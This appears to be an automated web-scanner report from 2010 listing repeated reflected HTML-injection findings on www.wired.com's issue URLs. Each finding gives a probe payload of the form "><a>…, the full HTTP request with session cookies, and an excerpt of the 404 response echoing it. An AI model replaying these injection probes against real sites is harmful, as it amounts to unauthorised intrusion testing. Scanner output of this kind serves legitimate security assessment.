This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /wired/issue9dd8a"><a>96480a8cd6d/16-07 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29352 Vary: Accept-Encoding Cache-Control: max-age=220 Expires: Mon, 22 Nov 2010 01:08:24 GMT Date: Mon, 22 Nov 2010 01:04:44 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_wired ss_issue9dd8a"><a>96480a8cd6d c_16-07"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e1f17"><a>1afdb79e6a5 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /wired/issue/16-07e1f17"><a>1afdb79e6a5 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29352 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Mon, 22 Nov 2010 01:09:33 GMT Date: Mon, 22 Nov 2010 01:05:33 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_wired ss_issue c_16-07e1f17"><a>1afdb79e6a5"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ff591"><a>46f679cbbb3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /wired/issueff591"><a>46f679cbbb3/16-08 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29352 Vary: Accept-Encoding Cache-Control: max-age=219 Expires: Mon, 22 Nov 2010 01:08:07 GMT Date: Mon, 22 Nov 2010 01:04:28 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_wired ss_issueff591"><a>46f679cbbb3 c_16-08"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e6d50"><a>2ace45fa09d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /wired/issue/16-08e6d50"><a>2ace45fa09d HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29352 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Mon, 22 Nov 2010 01:09:28 GMT Date: Mon, 22 Nov 2010 01:05:28 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_wired ss_issue c_16-08e6d50"><a>2ace45fa09d"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8c954"><a>36a920c6495 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /wired/issue8c954"><a>36a920c6495/16-09 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29352 Vary: Accept-Encoding Cache-Control: max-age=219 Expires: Mon, 22 Nov 2010 01:06:17 GMT Date: Mon, 22 Nov 2010 01:02:38 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_wired ss_issue8c954"><a>36a920c6495 c_16-09"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 43bb9"><a>b0f9cc9a179 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /wired/issue/16-0943bb9"><a>b0f9cc9a179 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29352 Vary: Accept-Encoding Cache-Control: max-age=226 Expires: Mon, 22 Nov 2010 01:07:15 GMT Date: Mon, 22 Nov 2010 01:03:29 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_wired ss_issue c_16-0943bb9"><a>b0f9cc9a179"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c841a"><a>4d579212ed5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /wired/issuec841a"><a>4d579212ed5/16-10 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29352 Vary: Accept-Encoding Cache-Control: max-age=238 Expires: Mon, 22 Nov 2010 01:06:35 GMT Date: Mon, 22 Nov 2010 01:02:37 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_wired ss_issuec841a"><a>4d579212ed5 c_16-10"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3d02f"><a>4a9c57581a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /wired/issue/16-103d02f"><a>4a9c57581a HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29350 Vary: Accept-Encoding Cache-Control: max-age=226 Expires: Mon, 22 Nov 2010 01:07:10 GMT Date: Mon, 22 Nov 2010 01:03:24 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_wired ss_issue c_16-103d02f"><a>4a9c57581a"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 56a69"><a>5ad80dfb3b7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /wired/issue56a69"><a>5ad80dfb3b7/16-11 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29352 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Mon, 22 Nov 2010 01:06:32 GMT Date: Mon, 22 Nov 2010 01:02:32 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_wired ss_issue56a69"><a>5ad80dfb3b7 c_16-11"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8228f"><a>340cdb6273d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /wired/issue/16-118228f"><a>340cdb6273d HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29352 Vary: Accept-Encoding Cache-Control: max-age=217 Expires: Mon, 22 Nov 2010 01:06:53 GMT Date: Mon, 22 Nov 2010 01:03:16 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_wired ss_issue c_16-118228f"><a>340cdb6273d"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 70903"><a>c8dc6145ff was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /wired/issue70903"><a>c8dc6145ff/16-12 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29350 Vary: Accept-Encoding Cache-Control: max-age=235 Expires: Mon, 22 Nov 2010 01:06:03 GMT Date: Mon, 22 Nov 2010 01:02:08 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_wired ss_issue70903"><a>c8dc6145ff c_16-12"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1c54b"><a>4cbaf84c7f1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /wired/issue/16-121c54b"><a>4cbaf84c7f1 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29352 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Mon, 22 Nov 2010 01:07:01 GMT Date: Mon, 22 Nov 2010 01:03:01 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_wired ss_issue c_16-121c54b"><a>4cbaf84c7f1"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f3d4f"><a>120753b7ddd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /wired/issuef3d4f"><a>120753b7ddd/17-01 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29352 Vary: Accept-Encoding Cache-Control: max-age=221 Expires: Mon, 22 Nov 2010 01:05:57 GMT Date: Mon, 22 Nov 2010 01:02:16 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_wired ss_issuef3d4f"><a>120753b7ddd c_17-01"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fba0a"><a>b4ec8eb31ef was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /wired/issue/17-01fba0a"><a>b4ec8eb31ef HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29352 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Mon, 22 Nov 2010 01:07:13 GMT Date: Mon, 22 Nov 2010 01:03:13 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_wired ss_issue c_17-01fba0a"><a>b4ec8eb31ef"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 715a4"><a>7789c2854ae was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /wired/issue715a4"><a>7789c2854ae/17-02 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29352 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Mon, 22 Nov 2010 01:06:20 GMT Date: Mon, 22 Nov 2010 01:02:20 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_wired ss_issue715a4"><a>7789c2854ae c_17-02"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 328c0"><a>0a02706438d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /wired/issue/17-02328c0"><a>0a02706438d HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29352 Vary: Accept-Encoding Cache-Control: max-age=231 Expires: Mon, 22 Nov 2010 01:07:00 GMT Date: Mon, 22 Nov 2010 01:03:09 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_wired ss_issue c_17-02328c0"><a>0a02706438d"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 75d8b"><a>04647b3dbcd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /wired/issue75d8b"><a>04647b3dbcd/17-03 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29352 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Mon, 22 Nov 2010 01:06:28 GMT Date: Mon, 22 Nov 2010 01:02:28 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_wired ss_issue75d8b"><a>04647b3dbcd c_17-03"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 55665"><a>72948330198 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /wired/issue/17-0355665"><a>72948330198 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29352 Vary: Accept-Encoding Cache-Control: max-age=217 Expires: Mon, 22 Nov 2010 01:06:59 GMT Date: Mon, 22 Nov 2010 01:03:22 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_wired ss_issue c_17-0355665"><a>72948330198"> ...[SNIP]...
